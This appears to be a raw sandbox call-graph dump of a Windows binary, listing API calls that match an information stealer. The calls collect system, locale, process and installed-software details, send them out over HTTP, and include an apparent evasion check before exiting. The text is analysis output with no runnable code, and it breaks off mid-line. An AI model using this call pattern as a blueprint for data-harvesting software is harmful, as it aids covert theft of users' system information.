14844->14845 14846 2fa8a0 lstrcpy 14845->14846 14847 2e4d28 14846->14847 14848 2fa9b0 4 API calls 14847->14848 14849 2e4d47 14848->14849 14850 2fa8a0 lstrcpy 14849->14850 14851 2e4d50 14850->14851 14852 2fa920 3 API calls 14851->14852 14853 2e4d6e 14852->14853 14854 2fa8a0 lstrcpy 14853->14854 14855 2e4d77 14854->14855 14856 2fa740 lstrcpy 14855->14856 14857 2e4d92 14856->14857 14858 2fa920 3 API calls 14857->14858 14859 2e4db3 14858->14859 14860 2fa920 3 API calls 14859->14860 14861 2e4dba 14860->14861 14862 2fa8a0 lstrcpy 14861->14862 14863 2e4dc6 14862->14863 14864 2e4de7 lstrlen 14863->14864 14865 2e4dfa 14864->14865 14866 2e4e03 lstrlen 14865->14866 15805 2faad0 14866->15805 14868 2e4e13 HttpSendRequestA 14869 2e4e32 InternetReadFile 14868->14869 14870 2e4e67 InternetCloseHandle 14869->14870 14875 2e4e5e 14869->14875 14873 2fa800 14870->14873 14872 2fa9b0 4 API calls 14872->14875 14873->14794 14874 2fa8a0 lstrcpy 14874->14875 14875->14869 14875->14870 14875->14872 14875->14874 15812 2faad0 14876->15812 14878 2f17c4 StrCmpCA 14879 2f17cf ExitProcess 14878->14879 14880 2f17d7 14878->14880 14881 2f19c2 14880->14881 14882 2f18cf StrCmpCA 14880->14882 14883 2f18ad StrCmpCA 14880->14883 14884 2f187f StrCmpCA 14880->14884 14885 2f185d StrCmpCA 14880->14885 14886 2f1913 StrCmpCA 14880->14886 14887 2f1932 StrCmpCA 14880->14887 14888 2f18f1 StrCmpCA 14880->14888 14889 2f1951 StrCmpCA 14880->14889 14890 2f1970 StrCmpCA 14880->14890 14891 2fa820 lstrlen lstrcpy 14880->14891 14881->13799 14882->14880 14883->14880 14884->14880 14885->14880 14886->14880 14887->14880 14888->14880 14889->14880 14890->14880 14891->14880 14893 2fa7a0 lstrcpy 14892->14893 14894 2e5979 14893->14894 14895 2e47b0 2 API calls 14894->14895 14896 2e5985 14895->14896 14897 2fa740 lstrcpy 14896->14897 14898 2e59ba 14897->14898 14899 2fa740 lstrcpy 14898->14899 14900 2e59c7 14899->14900 14901 2fa740 lstrcpy 14900->14901 14902 2e59d4 14901->14902 14903 2fa740 lstrcpy 14902->14903 14904 2e59e1 14903->14904 14905 2fa740 lstrcpy 14904->14905 14906 2e59ee InternetOpenA StrCmpCA 14905->14906 14907 2e5a1d 14906->14907 14908 2e5fc3 InternetCloseHandle 14907->14908 14909 2f8b60 3 API calls 14907->14909 14910 2e5fe0 14908->14910 14911 2e5a3c 14909->14911 14912 2e9ac0 4 API calls 14910->14912 14913 2fa920 3 API calls 14911->14913 14914 2e5fe6 14912->14914 14915 2e5a4f 14913->14915 14917 2fa820 2 API calls 14914->14917 14920 2e601f codecvt 14914->14920 14916 2fa8a0 lstrcpy 14915->14916 14921 2e5a58 14916->14921 14918 2e5ffd 14917->14918 14919 2fa9b0 4 API calls 14918->14919 14922 2e6013 14919->14922 14924 2fa7a0 lstrcpy 14920->14924 14925 2fa9b0 4 API calls 14921->14925 14923 2fa8a0 lstrcpy 14922->14923 14923->14920 14934 2e604f 14924->14934 14926 2e5a82 14925->14926 14927 2fa8a0 lstrcpy 14926->14927 14928 2e5a8b 14927->14928 14929 2fa9b0 4 API calls 14928->14929 14930 2e5aaa 14929->14930 14931 2fa8a0 lstrcpy 14930->14931 14932 2e5ab3 14931->14932 14933 2fa920 3 API calls 14932->14933 14935 2e5ad1 14933->14935 14934->13805 14936 2fa8a0 lstrcpy 14935->14936 14937 2e5ada 14936->14937 14938 2fa9b0 4 API calls 14937->14938 14939 2e5af9 14938->14939 14940 2fa8a0 lstrcpy 14939->14940 14941 2e5b02 14940->14941 14942 2fa9b0 4 API calls 14941->14942 14943 2e5b21 14942->14943 14944 2fa8a0 lstrcpy 14943->14944 14945 2e5b2a 14944->14945 14946 2fa9b0 4 API calls 14945->14946 14947 2e5b56 14946->14947 14948 2fa920 3 API calls 14947->14948 14949 2e5b5d 14948->14949 14950 2fa8a0 lstrcpy 14949->14950 14951 2e5b66 14950->14951 14952 2e5b7c InternetConnectA 14951->14952 14952->14908 14953 2e5bac HttpOpenRequestA 14952->14953 14955 2e5c0b 14953->14955 14956 2e5fb6 InternetCloseHandle 14953->14956 14957 2fa9b0 4 API calls 14955->14957 14956->14908 14958 2e5c1f 14957->14958 14959 2fa8a0 lstrcpy 14958->14959 14960 2e5c28 14959->14960 14961 2fa920 3 API calls 14960->14961 14962 2e5c46 14961->14962 14963 2fa8a0 lstrcpy 14962->14963 14964 2e5c4f 14963->14964 14965 2fa9b0 4 API calls 14964->14965 14966 2e5c6e 14965->14966 14967 2fa8a0 lstrcpy 14966->14967 14968 2e5c77 14967->14968 14969 2fa9b0 4 API calls 14968->14969 14970 2e5c98 14969->14970 14971 2fa8a0 lstrcpy 14970->14971 14972 2e5ca1 14971->14972 14973 2fa9b0 4 API calls 14972->14973 14974 2e5cc1 14973->14974 14975 2fa8a0 lstrcpy 14974->14975 14976 2e5cca 14975->14976 14977 2fa9b0 4 API calls 14976->14977 14978 2e5ce9 14977->14978 14979 2fa8a0 lstrcpy 14978->14979 14980 2e5cf2 14979->14980 14981 2fa920 3 API calls 14980->14981 14982 2e5d10 14981->14982 14983 2fa8a0 lstrcpy 14982->14983 14984 2e5d19 14983->14984 14985 2fa9b0 4 API calls 14984->14985 14986 2e5d38 14985->14986 14987 2fa8a0 lstrcpy 14986->14987 14988 2e5d41 14987->14988 14989 2fa9b0 4 API calls 14988->14989 14990 2e5d60 14989->14990 14991 2fa8a0 lstrcpy 14990->14991 14992 2e5d69 14991->14992 14993 2fa920 3 API calls 14992->14993 14994 2e5d87 14993->14994 14995 2fa8a0 lstrcpy 14994->14995 14996 2e5d90 14995->14996 14997 2fa9b0 4 API calls 14996->14997 14998 2e5daf 14997->14998 14999 2fa8a0 lstrcpy 14998->14999 15000 2e5db8 14999->15000 15001 2fa9b0 4 API calls 15000->15001 15002 2e5dd9 15001->15002 15003 2fa8a0 lstrcpy 15002->15003 15004 2e5de2 15003->15004 15005 2fa9b0 4 API calls 15004->15005 15006 2e5e02 15005->15006 15007 2fa8a0 lstrcpy 15006->15007 15008 2e5e0b 15007->15008 15009 2fa9b0 4 API calls 15008->15009 15010 2e5e2a 15009->15010 15011 2fa8a0 lstrcpy 15010->15011 15012 2e5e33 15011->15012 15013 2fa920 3 API calls 15012->15013 15014 2e5e54 15013->15014 15015 2fa8a0 lstrcpy 15014->15015 15016 2e5e5d 15015->15016 15017 2e5e70 lstrlen 15016->15017 15813 2faad0 15017->15813 15019 2e5e81 lstrlen GetProcessHeap RtlAllocateHeap 15814 2faad0 15019->15814 15021 2e5eae lstrlen 15022 2e5ebe 15021->15022 15023 2e5ed7 lstrlen 15022->15023 15024 2e5ee7 15023->15024 15025 2e5ef0 lstrlen 15024->15025 15026 2e5f03 15025->15026 15027 2e5f1a lstrlen 15026->15027 15815 2faad0 15027->15815 15029 2e5f2a HttpSendRequestA 15030 2e5f35 InternetReadFile 15029->15030 15031 2e5f6a InternetCloseHandle 15030->15031 15035 2e5f61 15030->15035 15031->14956 15033 2fa9b0 4 API calls 15033->15035 15034 2fa8a0 lstrcpy 15034->15035 15035->15030 15035->15031 15035->15033 15035->15034 15038 2f1077 15036->15038 15037 2f1151 15037->13807 15038->15037 15039 2fa820 lstrlen lstrcpy 15038->15039 15039->15038 15041 2f0db7 15040->15041 15042 2f0f17 15041->15042 15043 2f0e27 StrCmpCA 15041->15043 15044 2f0e67 StrCmpCA 15041->15044 15045 2f0ea4 StrCmpCA 15041->15045 15046 2fa820 lstrlen lstrcpy 15041->15046 15042->13815 15043->15041 15044->15041 15045->15041 15046->15041 15051 2f0f67 15047->15051 15048 2f1044 15048->13823 15049 2f0fb2 StrCmpCA 15049->15051 15050 2fa820 lstrlen lstrcpy 15050->15051 15051->15048 15051->15049 15051->15050 15053 2fa740 lstrcpy 15052->15053 15054 2f1a26 15053->15054 15055 2fa9b0 4 API calls 15054->15055 15056 2f1a37 15055->15056 15057 2fa8a0 lstrcpy 15056->15057 15058 2f1a40 15057->15058 15059 2fa9b0 4 API calls 15058->15059 15060 2f1a5b 15059->15060 15061 2fa8a0 lstrcpy 15060->15061 15062 2f1a64 15061->15062 15063 2fa9b0 4 API calls 15062->15063 15064 2f1a7d 15063->15064 15065 2fa8a0 lstrcpy 15064->15065 15066 2f1a86 15065->15066 15067 2fa9b0 4 API calls 15066->15067 15068 2f1aa1 15067->15068 15069 2fa8a0 lstrcpy 15068->15069 15070 2f1aaa 15069->15070 15071 2fa9b0 4 API calls 15070->15071 15072 2f1ac3 15071->15072 15073 2fa8a0 lstrcpy 15072->15073 15074 2f1acc 15073->15074 15075 2fa9b0 4 API calls 15074->15075 15076 2f1ae7 15075->15076 15077 2fa8a0 lstrcpy 15076->15077 15078 2f1af0 15077->15078 15079 2fa9b0 4 API calls 15078->15079 15080 2f1b09 15079->15080 15081 2fa8a0 lstrcpy 15080->15081 15082 2f1b12 15081->15082 15083 2fa9b0 4 API calls 15082->15083 15084 2f1b2d 15083->15084 15085 2fa8a0 lstrcpy 15084->15085 15086 2f1b36 15085->15086 15087 2fa9b0 4 API calls 15086->15087 15088 2f1b4f 15087->15088 15089 2fa8a0 lstrcpy 15088->15089 15090 2f1b58 15089->15090 15091 2fa9b0 4 API calls 15090->15091 15092 2f1b76 15091->15092 15093 2fa8a0 lstrcpy 15092->15093 15094 2f1b7f 15093->15094 15095 2f7500 6 API calls 15094->15095 15096 2f1b96 15095->15096 15097 2fa920 3 API calls 15096->15097 15098 2f1ba9 15097->15098 15099 2fa8a0 lstrcpy 15098->15099 15100 2f1bb2 15099->15100 15101 2fa9b0 4 API calls 15100->15101 15102 2f1bdc 15101->15102 15103 2fa8a0 lstrcpy 15102->15103 15104 2f1be5 15103->15104 15105 2fa9b0 4 API calls 15104->15105 15106 2f1c05 15105->15106 15107 2fa8a0 lstrcpy 15106->15107 15108 2f1c0e 15107->15108 15816 2f7690 GetProcessHeap RtlAllocateHeap 15108->15816 15111 2fa9b0 4 API calls 15112 2f1c2e 15111->15112 15113 2fa8a0 lstrcpy 15112->15113 15114 2f1c37 15113->15114 15115 2fa9b0 4 API calls 15114->15115 15116 2f1c56 15115->15116 15117 2fa8a0 lstrcpy 15116->15117 15118 2f1c5f 15117->15118 15119 2fa9b0 4 API calls 15118->15119 15120 2f1c80 15119->15120 15121 2fa8a0 lstrcpy 15120->15121 15122 2f1c89 15121->15122 15823 2f77c0 GetCurrentProcess IsWow64Process 15122->15823 15125 2fa9b0 4 API calls 15126 2f1ca9 15125->15126 15127 2fa8a0 lstrcpy 15126->15127 15128 2f1cb2 15127->15128 15129 2fa9b0 4 API calls 15128->15129 15130 2f1cd1 15129->15130 15131 2fa8a0 lstrcpy 15130->15131 15132 2f1cda 15131->15132 15133 2fa9b0 4 API calls 15132->15133 15134 2f1cfb 15133->15134 15135 2fa8a0 lstrcpy 15134->15135 15136 2f1d04 15135->15136 15137 2f7850 3 API calls 15136->15137 15138 2f1d14 15137->15138 15139 2fa9b0 4 API calls 15138->15139 15140 2f1d24 15139->15140 15141 2fa8a0 lstrcpy 15140->15141 15142 2f1d2d 15141->15142 15143 2fa9b0 4 API calls 15142->15143 15144 2f1d4c 15143->15144 15145 2fa8a0 lstrcpy 15144->15145 15146 2f1d55 15145->15146 15147 2fa9b0 4 API calls 15146->15147 15148 2f1d75 15147->15148 15149 2fa8a0 lstrcpy 15148->15149 15150 2f1d7e 15149->15150 15151 2f78e0 3 API calls 15150->15151 15152 2f1d8e 15151->15152 15153 2fa9b0 4 API calls 15152->15153 15154 2f1d9e 15153->15154 15155 2fa8a0 lstrcpy 15154->15155 15156 2f1da7 15155->15156 15157 2fa9b0 4 API calls 15156->15157 15158 2f1dc6 15157->15158 15159 2fa8a0 lstrcpy 15158->15159 15160 2f1dcf 15159->15160 15161 2fa9b0 4 API calls 15160->15161 15162 2f1df0 15161->15162 15163 2fa8a0 lstrcpy 15162->15163 15164 2f1df9 15163->15164 15825 2f7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15164->15825 15167 2fa9b0 4 API calls 15168 2f1e19 15167->15168 15169 2fa8a0 lstrcpy 15168->15169 15170 2f1e22 15169->15170 15171 2fa9b0 4 API calls 15170->15171 15172 2f1e41 15171->15172 15173 2fa8a0 lstrcpy 15172->15173 15174 2f1e4a 15173->15174 15175 2fa9b0 4 API calls 15174->15175 15176 2f1e6b 15175->15176 15177 2fa8a0 lstrcpy 15176->15177 15178 2f1e74 15177->15178 15827 2f7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15178->15827 15181 2fa9b0 4 API calls 15182 2f1e94 15181->15182 15183 2fa8a0 lstrcpy 15182->15183 15184 2f1e9d 15183->15184 15185 2fa9b0 4 API calls 15184->15185 15186 2f1ebc 15185->15186 15187 2fa8a0 lstrcpy 15186->15187 15188 2f1ec5 15187->15188 15189 2fa9b0 4 API calls 15188->15189 15190 2f1ee5 15189->15190 15191 2fa8a0 lstrcpy 15190->15191 15192 2f1eee 15191->15192 15830 2f7b00 GetUserDefaultLocaleName 15192->15830 15195 2fa9b0 4 API calls 15196 2f1f0e 15195->15196 15197 2fa8a0 lstrcpy 15196->15197 15198 2f1f17 15197->15198 15199 2fa9b0 4 API calls 15198->15199 15200 2f1f36 15199->15200 15201 2fa8a0 lstrcpy 15200->15201 15202 2f1f3f 15201->15202 15203 2fa9b0 4 API calls 15202->15203 15204 2f1f60 15203->15204 15205 2fa8a0 lstrcpy 15204->15205 15206 2f1f69 15205->15206 15834 2f7b90 15206->15834 15208 2f1f80 15209 2fa920 3 API calls 15208->15209 15210 2f1f93 15209->15210 15211 2fa8a0 lstrcpy 15210->15211 15212 2f1f9c 15211->15212 15213 2fa9b0 4 API calls 15212->15213 15214 2f1fc6 15213->15214 15215 2fa8a0 lstrcpy 15214->15215 15216 2f1fcf 15215->15216 15217 2fa9b0 4 API calls 15216->15217 15218 2f1fef 15217->15218 15219 2fa8a0 lstrcpy 15218->15219 15220 2f1ff8 15219->15220 15846 2f7d80 GetSystemPowerStatus 15220->15846 15223 2fa9b0 4 API calls 15224 2f2018 15223->15224 15225 2fa8a0 lstrcpy 15224->15225 15226 2f2021 15225->15226 15227 2fa9b0 4 API calls 15226->15227 15228 2f2040 15227->15228 15229 2fa8a0 lstrcpy 15228->15229 15230 2f2049 15229->15230 15231 2fa9b0 4 API calls 15230->15231 15232 2f206a 15231->15232 15233 2fa8a0 lstrcpy 15232->15233 15234 2f2073 15233->15234 15235 2f207e GetCurrentProcessId 15234->15235 15848 2f9470 OpenProcess 15235->15848 15238 2fa920 3 API calls 15239 2f20a4 15238->15239 15240 2fa8a0 lstrcpy 15239->15240 15241 2f20ad 15240->15241 15242 2fa9b0 4 API calls 15241->15242 15243 2f20d7 15242->15243 15244 2fa8a0 lstrcpy 15243->15244 15245 2f20e0 15244->15245 15246 2fa9b0 4 API calls 15245->15246 15247 2f2100 15246->15247 15248 2fa8a0 lstrcpy 15247->15248 15249 2f2109 15248->15249 15853 2f7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15249->15853 15252 2fa9b0 4 API calls 15253 2f2129 15252->15253 15254 2fa8a0 lstrcpy 15253->15254 15255 2f2132 15254->15255 15256 2fa9b0 4 API calls 15255->15256 15257 2f2151 15256->15257 15258 2fa8a0 lstrcpy 15257->15258 15259 2f215a 15258->15259 15260 2fa9b0 4 API calls 15259->15260 15261 2f217b 15260->15261 15262 2fa8a0 lstrcpy 15261->15262 15263 2f2184 15262->15263 15857 2f7f60 15263->15857 15266 2fa9b0 4 API calls 15267 2f21a4 15266->15267 15268 2fa8a0 lstrcpy 15267->15268 15269 2f21ad 15268->15269 15270 2fa9b0 4 API calls 15269->15270 15271 2f21cc 15270->15271 15272 2fa8a0 lstrcpy 15271->15272 15273 2f21d5 15272->15273 15274 2fa9b0 4 API calls 15273->15274 15275 2f21f6 15274->15275 15276 2fa8a0 lstrcpy 15275->15276 15277 2f21ff 15276->15277 15870 2f7ed0 GetSystemInfo wsprintfA 15277->15870 15280 2fa9b0 4 API calls 15281 2f221f 15280->15281 15282 2fa8a0 lstrcpy 15281->15282 15283 2f2228 15282->15283 15284 2fa9b0 4 API calls 15283->15284 15285 2f2247 15284->15285 15286 2fa8a0 lstrcpy 15285->15286 15287 2f2250 15286->15287 15288 2fa9b0 4 API calls 15287->15288 15289 2f2270 15288->15289 15290 2fa8a0 lstrcpy 15289->15290 15291 2f2279 15290->15291 15872 2f8100 GetProcessHeap RtlAllocateHeap 15291->15872 15294 2fa9b0 4 API calls 15295 2f2299 15294->15295 15296 2fa8a0 lstrcpy 15295->15296 15297 2f22a2 15296->15297 15298 2fa9b0 4 API calls 15297->15298 15299 2f22c1 15298->15299 15300 2fa8a0 lstrcpy 15299->15300 15301 2f22ca 15300->15301 15302 2fa9b0 4 API calls 15301->15302 15303 2f22eb 15302->15303 15304 2fa8a0 lstrcpy 15303->15304 15305 2f22f4 15304->15305 15878 2f87c0 15305->15878 15308 2fa920 3 API calls 15309 2f231e 15308->15309 15310 2fa8a0 lstrcpy 15309->15310 15311 2f2327 15310->15311 15312 2fa9b0 4 API calls 15311->15312 15313 2f2351 15312->15313 15314 2fa8a0 lstrcpy 15313->15314 15315 2f235a 15314->15315 15316 2fa9b0 4 API calls 15315->15316 15317 2f237a 15316->15317 15318 2fa8a0 lstrcpy 15317->15318 15319 2f2383 15318->15319 15320 2fa9b0 4 API calls 15319->15320 15321 2f23a2 15320->15321 15322 2fa8a0 lstrcpy 15321->15322 15323 2f23ab 15322->15323 15883 2f81f0 15323->15883 15325 2f23c2 15326 2fa920 3 API calls 15325->15326 15327 2f23d5 15326->15327 15328 2fa8a0 lstrcpy 15327->15328 15329 2f23de 15328->15329 15330 2fa9b0 4 API calls 15329->15330 15331 2f240a 15330->15331 15332 2fa8a0 lstrcpy 15331->15332 15333 2f2413 15332->15333 15334 2fa9b0 4 API calls 15333->15334 15335 2f2432 15334->15335 15336 2fa8a0 lstrcpy 15335->15336 15337 2f243b 15336->15337 15338 2fa9b0 4 API calls 15337->15338 15339 2f245c 15338->15339 15340 2fa8a0 lstrcpy 15339->15340 15341 2f2465 15340->15341 15342 2fa9b0 4 API calls 15341->15342 15343 2f2484 15342->15343 15344 2fa8a0 lstrcpy 15343->15344 15345 2f248d 15344->15345 15346 2fa9b0 4 API calls 15345->15346 15347 2f24ae 15346->15347 15348 2fa8a0 lstrcpy 15347->15348 15349 2f24b7 15348->15349 15891 2f8320 15349->15891 15351 2f24d3 15352 2fa920 3 API calls 15351->15352 15353 2f24e6 15352->15353 15354 2fa8a0 lstrcpy 15353->15354 15355 2f24ef 15354->15355 15356 2fa9b0 4 API calls 15355->15356 15357 2f2519 15356->15357 15358 2fa8a0 lstrcpy 15357->15358 15359 2f2522 15358->15359 15360 2fa9b0 4 API calls 15359->15360 15361 2f2543 15360->15361 15362 2fa8a0 lstrcpy 15361->15362 15363 2f254c 15362->15363 15364 2f8320 17 API calls 15363->15364 15365 2f2568 15364->15365 15366 2fa920 3 API calls 15365->15366 15367 2f257b 15366->15367 15368 2fa8a0 lstrcpy 15367->15368 15369 2f2584 15368->15369 15370 2fa9b0 4 API calls 15369->15370 15371 2f25ae 15370->15371 15372 2fa8a0 lstrcpy 15371->15372 15373 2f25b7 15372->15373 15374 2fa9b0 4 API calls 15373->15374 15375 2f25d6 15374->15375 15376 2fa8a0 lstrcpy 15375->15376 15377 2f25df 15376->15377 15378 2fa9b0 4 API calls 15377->15378 15379 2f2600 15378->15379 15380 2fa8a0 lstrcpy 15379->15380 15381 2f2609 15380->15381 15927 2f8680 15381->15927 15383 2f2620 15384 2fa920 3 API calls 15383->15384 15385 2f2633 15384->15385 15386 2fa8a0 lstrcpy 15385->15386 15387 2f263c 15386->15387 15388 2f265a lstrlen 15387->15388 15389 2f266a 15388->15389 15390 2fa740 lstrcpy 15389->15390 15391 2f267c 15390->15391 15392 2e1590 lstrcpy 15391->15392 15393 2f268d 15392->15393 15937 2f5190 15393->15937 15395 2f2699 15395->13827 16125 2faad0 15396->16125 15398 2e5009 InternetOpenUrlA 15402 2e5021 15398->15402 15399 2e502a InternetReadFile 15399->15402 15400 2e50a0 InternetCloseHandle InternetCloseHandle 15401 2e50ec 15400->15401 15401->13831 15402->15399 15402->15400 16126 2e98d0 15403->16126 15405 2f0759 15406 2f077d 15405->15406 15407 2f0a38 15405->15407 15409 2f0799 StrCmpCA 15406->15409 15408 2e1590 lstrcpy 15407->15408 15410 2f0a49 15408->15410 15412 2f07a8 15409->15412 15436 2f0843 15409->15436 16302 2f0250 15410->16302 15414 2fa7a0 lstrcpy 15412->15414 15416 2f07c3 15414->15416 15415 2f0865 StrCmpCA 15417 2f0874 15415->15417 15455 2f096b 15415->15455 15418 2e1590 lstrcpy 15416->15418 15419 2fa740 lstrcpy 15417->15419 15420 2f080c 15418->15420 15422 2f0881 15419->15422 15423 2fa7a0 lstrcpy 15420->15423 15421 2f099c StrCmpCA 15425 2f09ab 15421->15425 15444 2f0a2d 15421->15444 15426 2fa9b0 4 API calls 15422->15426 15424 2f0823 15423->15424 15427 2fa7a0 lstrcpy 15424->15427 15428 2e1590 lstrcpy 15425->15428 15429 2f08ac 15426->15429 15430 2f083e 15427->15430 15431 2f09f4 15428->15431 15432 2fa920 3 API calls 15429->15432 16129 2efb00 15430->16129 15434 2fa7a0 lstrcpy 15431->15434 15435 2f08b3 15432->15435 15437 2f0a0d 15434->15437 15438 2fa9b0 4 API calls 15435->15438 15436->15415 15440 2fa7a0 lstrcpy 15437->15440 15439 2f08ba 15438->15439 15442 2f0a28 15440->15442 16245 2f0030 15442->16245 15444->13835 15455->15421 15777 2fa7a0 lstrcpy 15776->15777 15778 2e1683 15777->15778 15779 2fa7a0 lstrcpy 15778->15779 15780 2e1695 15779->15780 15781 2fa7a0 lstrcpy 15780->15781 15782 2e16a7 15781->15782 15783 2fa7a0 lstrcpy 15782->15783 15784 2e15a3 15783->15784 15784->14658 15786 2e47c6 15785->15786 15787 2e4838 lstrlen 15786->15787 15811 2faad0 15787->15811 15789 2e4848 InternetCrackUrlA 15790 2e4867 15789->15790 15790->14735 15792 2fa740 lstrcpy 15791->15792 15793 2f8b74 15792->15793 15794 2fa740 lstrcpy 15793->15794 15795 2f8b82 GetSystemTime 15794->15795 15796 2f8b99 15795->15796 15797 2fa7a0 lstrcpy 15796->15797 15798 2f8bfc 15797->15798 15798->14750 15801 2fa931 15799->15801 15800 2fa988 15802 2fa7a0 lstrcpy 15800->15802 15801->15800 15803 2fa968 lstrcpy lstrcat 15801->15803 15804 2fa994 15802->15804 15803->15800 15804->14754 15805->14868 15807 2e4eee 15806->15807 15808 2e9af9 LocalAlloc 15806->15808 15807->14756 15807->14759 15808->15807 15809 2e9b14 CryptStringToBinaryA 15808->15809 15809->15807 15810 2e9b39 LocalFree 15809->15810 15810->15807 15811->15789 15812->14878 15813->15019 15814->15021 15815->15029 15944 2f77a0 15816->15944 15819 2f1c1e 15819->15111 15820 2f76c6 RegOpenKeyExA 15821 2f76e7 RegQueryValueExA 15820->15821 15822 2f7704 RegCloseKey 15820->15822 15821->15822 15822->15819 15824 2f1c99 15823->15824 15824->15125 15826 2f1e09 15825->15826 15826->15167 15828 2f7a9a wsprintfA 15827->15828 15829 2f1e84 15827->15829 15828->15829 15829->15181 15831 2f7b4d 15830->15831 15832 2f1efe 15830->15832 15951 2f8d20 LocalAlloc CharToOemW 15831->15951 15832->15195 15835 2fa740 lstrcpy 15834->15835 15836 2f7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15835->15836 15837 2f7c25 15836->15837 15838 2f7d18 15837->15838 15839 2f7c46 GetLocaleInfoA 15837->15839 15842 2fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15837->15842 15845 2fa8a0 lstrcpy 15837->15845 15840 2f7d1e LocalFree 15838->15840 15841 2f7d28 15838->15841 15839->15837 15840->15841 15843 2fa7a0 lstrcpy 15841->15843 15842->15837 15844 2f7d37 15843->15844 15844->15208 15845->15837 15847 2f2008 15846->15847 15847->15223 15849 2f94b5 15848->15849 15850 2f9493 GetModuleFileNameExA CloseHandle 15848->15850 15851 2fa740 lstrcpy 15849->15851 15850->15849 15852 2f2091 15851->15852 15852->15238 15854 2f7e68 RegQueryValueExA 15853->15854 15855 2f2119 15853->15855 15856 2f7e8e RegCloseKey 15854->15856 15855->15252 15856->15855 15858 2f7fb9 GetLogicalProcessorInformationEx 15857->15858 15859 2f7fd8 GetLastError 15858->15859 15861 2f8029 15858->15861 15860 2f8022 15859->15860 15869 2f7fe3 15859->15869 15863 2f2194 15860->15863 15866 2f89f0 2 API calls 15860->15866 15865 2f89f0 2 API calls 15861->15865 15863->15266 15867 2f807b 15865->15867 15866->15863 15867->15860 15868 2f8084 wsprintfA 15867->15868 15868->15863 15869->15858 15869->15863 15952 2f89f0 15869->15952 15955 2f8a10 GetProcessHeap RtlAllocateHeap 15869->15955 15871 2f220f 15870->15871 15871->15280 15873 2f89b0 15872->15873 15874 2f814d GlobalMemoryStatusEx 15873->15874 15875 2f8163 __aulldiv 15874->15875 15876 2f819b wsprintfA 15875->15876 15877 2f2289 15876->15877 15877->15294 15879 2f87fb GetProcessHeap RtlAllocateHeap wsprintfA 15878->15879 15881 2fa740 lstrcpy 15879->15881 15882 2f230b 15881->15882 15882->15308 15884 2fa740 lstrcpy 15883->15884 15890 2f8229 15884->15890 15885 2f8263 15886 2fa7a0 lstrcpy 15885->15886 15888 2f82dc 15886->15888 15887 2fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15887->15890 15888->15325 15889 2fa8a0 lstrcpy 15889->15890 15890->15885 15890->15887 15890->15889 15892 2fa740 lstrcpy 15891->15892 15893 2f835c RegOpenKeyExA 15892->15893 15894 2f83ae 15893->15894 15895 2f83d0 15893->15895 15896 2fa7a0 lstrcpy 15894->15896 15897 2f83f8 RegEnumKeyExA 15895->15897 15898 2f8613 RegCloseKey 15895->15898 15907 2f83bd 15896->15907 15899 2f843f wsprintfA RegOpenKeyExA 15897->15899 15900 2f860e 15897->15900 15901 2fa7a0 lstrcpy 15898->15901 15902 2f8485 RegCloseKey RegCloseKey 15899->15902 15903 2f84c1 RegQueryValueExA 15899->15903 15900->15898 15901->15907 15904 2fa7a0 lstrcpy 15902->15904 15905 2f84fa lstrlen 15903->15905 15906 2f8601 RegCloseKey 15903->15906 15904->15907 15905->15906 15908 2f8510 15905->15908 15906->15900 15907->15351 15909 2fa9b0 4 API calls 15908->15909 15910 2f8527 15909->15910 15911 2fa8a0 lstrcpy 15910->15911 15912 2f8533 15911->15912 15913 2fa9b0 4 API calls 15912->15913 15914 2f8557 15913->15914 15915 2fa8a0 lstrcpy 15914->15915 15916 2f8563 15915->15916 15917 2f856e RegQueryValueExA 15916->15917 15917->15906 15918 2f85a3 15917->15918 15919 2fa9b0 4 API calls 15918->15919 15920 2f85ba 15919->15920 15921 2fa8a0 lstrcpy 15920->15921 15922 2f85c6 15921->15922 15923 2fa9b0 4 API calls 15922->15923 15924 2f85ea 15923->15924 15925 2fa8a0 lstrcpy 15924->15925 15926 2f85f6 15925->15926 15926->15906 15928 2fa740 lstrcpy 15927->15928 15929 2f86bc CreateToolhelp32Snapshot Process32First 15928->15929 15930 2f875d CloseHandle 15929->15930 15931 2f86e8 Process32Next 15929->15931 15932 2fa7a0 lstrcpy 15930->15932 15931->15930 15936 2f86fd 15931->15936 15933 2f8776 15932->15933 15933->15383 15934 2fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15934->15936 15935 2fa8a0 lstrcpy 15935->15936 15936->15931 15936->15934 15936->15935 15938 2fa7a0 lstrcpy 15937->15938 15939 2f51b5 15938->15939 15940 2e1590 lstrcpy 15939->15940 15941 2f51c6 15940->15941 15956 2e5100 15941->15956 15943 2f51cf 15943->15395 15947 2f7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15944->15947 15946 2f76b9 15946->15819 15946->15820 15948 2f7765 RegQueryValueExA 15947->15948 15949 2f7780 RegCloseKey 15947->15949 15948->15949 15950 2f7793 15949->15950 15950->15946 15951->15832 15953 2f8a0c 15952->15953 15954 2f89f9 GetProcessHeap HeapFree 15952->15954 15953->15869 15954->15953 15955->15869 15957 2fa7a0 lstrcpy 15956->15957 15958 2e5119 15957->15958 15959 2e47b0 2 API calls 15958->15959 15960 2e5125 15959->15960 16116 2f8ea0 15960->16116 15962 2e5184 15963 2e5192 lstrlen 15962->15963 15964 2e51a5 15963->15964 15965 2f8ea0 4 API calls 15964->15965 15966 2e51b6 15965->15966 15967 2fa740 lstrcpy 15966->15967 15968 2e51c9 15967->15968 15969 2fa740 lstrcpy 15968->15969 15970 2e51d6 15969->15970 15971 2fa740 lstrcpy 15970->15971 15972 2e51e3 15971->15972 15973 2fa740 lstrcpy 15972->15973 15974 2e51f0 15973->15974 15975 2fa740 lstrcpy 15974->15975 15976 2e51fd InternetOpenA StrCmpCA 15975->15976 15977 2e522f 15976->15977 15978 2e58c4 InternetCloseHandle 15977->15978 15979 2f8b60 3 API calls 15977->15979 15985 2e58d9 codecvt 15978->15985 15980 2e524e 15979->15980 15981 2fa920 3 API calls 15980->15981 15982 2e5261 15981->15982 15983 2fa8a0 lstrcpy 15982->15983 15984 2e526a 15983->15984 15986 2fa9b0 4 API calls 15984->15986 15989 2fa7a0 lstrcpy 15985->15989 15987 2e52ab 15986->15987 15988 2fa920 3 API calls 15987->15988 15990 2e52b2 15988->15990 15996 2e5913 15989->15996 15991 2fa9b0 4 API calls 15990->15991 15992 2e52b9 15991->15992 15993 